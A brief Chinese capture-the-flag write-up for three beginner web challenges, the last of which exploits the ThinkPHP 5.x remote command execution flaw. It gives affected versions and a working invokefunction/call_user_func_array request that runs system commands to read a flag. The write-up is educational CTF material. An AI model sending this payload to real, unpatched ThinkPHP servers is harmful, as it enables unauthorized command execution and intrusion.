baby_web
入门级题目,根据提示想到index.php,然后发现访问会302重定向
那就抓个包看看,发现flag在response header里
WWW-Robots
就差告诉你答案在robots.txt里面了
直接访问,得到//fl0g.php
直接访问,得到flag
php_rce
这题考的是php 5.0版本的一个远程命令执行漏洞
具体情况可以看这一篇https://blog.csdn.net/qq_40884727/article/details/101452478
当ThinkPHP 5.0系列 < 5.0.23
ThinkPHP 5.1系列 < 5.1.31且没有开启强制路由的情况下
构造形如?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat ../../../flag");'
的命令可以远程命令执行
index.php是一级目录,\think\php是默认的控制器名,由他来调用invokefunction(类似于java的invoke机制)
invokefunction反射刀call_uesr_func_array函数,然后调用system函数,最后一个参数所要执行的具体命令
参考视频链接:
https://www.bilibili.com/video/BV1Fg411E7r9?pop_share=1
https://www.bilibili.com/video/BV1n3411r7eL
https://www.bilibili.com/video/BV19g41177UN